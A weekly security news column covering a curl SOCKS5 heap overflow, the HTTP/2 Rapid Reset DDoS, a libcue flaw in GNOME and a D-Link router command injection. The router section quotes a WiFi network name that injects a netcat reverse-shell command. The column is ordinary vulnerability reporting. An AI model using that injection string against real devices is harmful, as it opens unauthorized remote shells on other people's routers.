This Week in Security: Curl Reveal, Rapid Reset DDoS, and Libcue
This Week in Security: Curl Reveal, Rapid Reset DDoS, and Libcue

Curl gave us all a big warning that a severe security problem had been found in that code-base. Given the staggering number of Curl installs around the world, we held our collective breath and waited for the bombshell to drop this Wednesday. It turns out, it’s not quite as bad as feared — so long as you don’t have a SOCKS proxy.

In hindsight, shipping a heap overflow in code installed in over twenty billion instances is not an experience I would recommend. — Daniel Stenberg

The trouble started when the SOCKS5 proxy support was converted to a non-blocking implementation. It’s a win for libcurl to work on requests asynchronously, but refactoring code and new features always runs a bit of risk. SOCKS5 proxying has some quirks, like allowing DNS resolution to happen locally or at the proxy. The new async code starts out with:

bool socks5_resolve_local =
(proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

First off, unnecessary ternary is unnecessary. But note that this local variable gets set by the proxytype. If that’s CURLPROXY_SOCKS5_HOSTNAME, then it uses remote resolution. But inherited from old code is a check for a hostname that is too long for a SOCKS request (255 bytes). This code converts back to local resolution in this case.

The important detail here is that this function is now a state machine, that potentially runs multiple times for a single request, to achieve that asynchronous execution. The check for a too-long hostname only happens during the initialization state. Copying the hostname into the buffer happens in a different state. If setting up the connection takes enough time, the function will return and be executed again when something has changed. The ternary check runs again, but not the hostname-too-long. So if set to do remote resolution with a long enough host name, execution slips through this edge case, and the long hostname is copied into a too-small buffer.

It’s safe to assume that this heap overflow can result in arbitrary code execution. The fix has landed in 8.4.0, after being present for 1,315 days. [Daniel] goes ahead and gets ahead of the inevitable suggestion that Curl should be written in rust or another memory-safe language. Curl was started before those alternatives existed, and there is a very slow effort to move portions of the project to memory-safe languages. And you’re welcome to help out.

Router Executes WiFi

It’s never a good sign when scanning for WiFi networks crashes your router. But when it’s an apostrophe that causes the problem, you might have something interesting.

The culprit here is a function that writes Access Point info to a temporary file. The data is constructed into a single command that uses echo to write to the file. And that means command injection. So yes, name a network '& nc notebook 1337 -e /bin/sh & and get a remote shell.

RedTeam Pentesting tried to report the vulnerability to D-Link for three months, and never received a response. As a result, these issues are now publicly released, and no patches are available. If you have a D-Link wireless device, it might be worth testing the Proof of Concept (PoC). And I think D-Link has officially made the ignominious list of hardware to never run stock firmware on.

Gnome Hit With Libcue

There’s a nasty issue in Gnome, where merely downloading a file can result in Remote Code Execution (RCE). The vulnerability is in libcue, a parser for cue sheets. It’s a straightforward issue, where a value overflows the max value of a signed integer, to become a negative value. That value is then used to index an array, and a negative value writes to an unsafe location outside the array. The value to be written is also taken from the cue file, making exploitation fairly easy.

Where this really gets ugly is in the Gnome desktop, where the tracker-miners service runs by default. This is essentially a search index tool. The problem is that it automatically runs parsing libraries for found files, and one of its search locations is in Downloads. And that’s the exploit. Download a .cue file, it gets indexed, and the library executes arbitrary code when parsing the download. Patches are available, and are making their way through the distributions to arrive at our desktops.

Rapid Reset

Cloudflare observed a novel Distributed Denial of Service (DDoS) attack in the wild, and it might not be what you expected. The headline is that this is a record-breaking DDoS resulting from an http/2 0-day. Most record-breaking DDoS attacks are based on reflection, but this one is a bit different.

Diving into the technical details tells the tale. HTTP/2 allows multiple requests to be combined, and the responses to be interleaved on a single TCP connection. Each of those request/response flows are tracked as streams, and there’s a limit on how many streams a single client can have open.

The interesting bit is that a client can send a stream reset request, which immediately frees that stream from the perspective of the max concurrent streams limit. But there’s a service behind that HTTP/2 connection, and it takes a bit of time to tear down the backend connections. If, like Cloudflare, you have a mid-stream proxy like Nginx in the mix, that imbalance can make quite a difference. Make many requests, then start resetting and restarting each of them, and you end up sending way more traffic down an HTTP/2 connection than is intended.

Bits and Bytes

There’s a new challenge for all you aspiring cryptographers. NIST publishes a handful of elliptic curves that were generated from NSA-provided hashes. These in turn were generated from something, probably sentences in English. But what sentences? That’s the challenge, and there twelve grand in US dollars to whoever can crack the nut first.

“Can’t stop, won’t stop” — Cisco, apparently. Yeah, once again, Cisco has to issue a security warning over hard-coded credentials in production software. Cisco is dangerously close to joining D-link on that list.

Sending your DNA to a big company, to get neat ancestry info — what could possibly go wrong? Credential stuffing, breaking into accounts, and then using that access to scrape info from other accounts that opted in to the DNA Relatives service. 23 and Me has released a statement, re-affirming that there wasn’t a wider breach, and suggesting that all users use multi-factor authentication. Regardless, there’s a claimed database of a million users leaked online, with more than that available for purchase. It’s not been confirmed if that is actual real data.

13 October 2023
>> Read More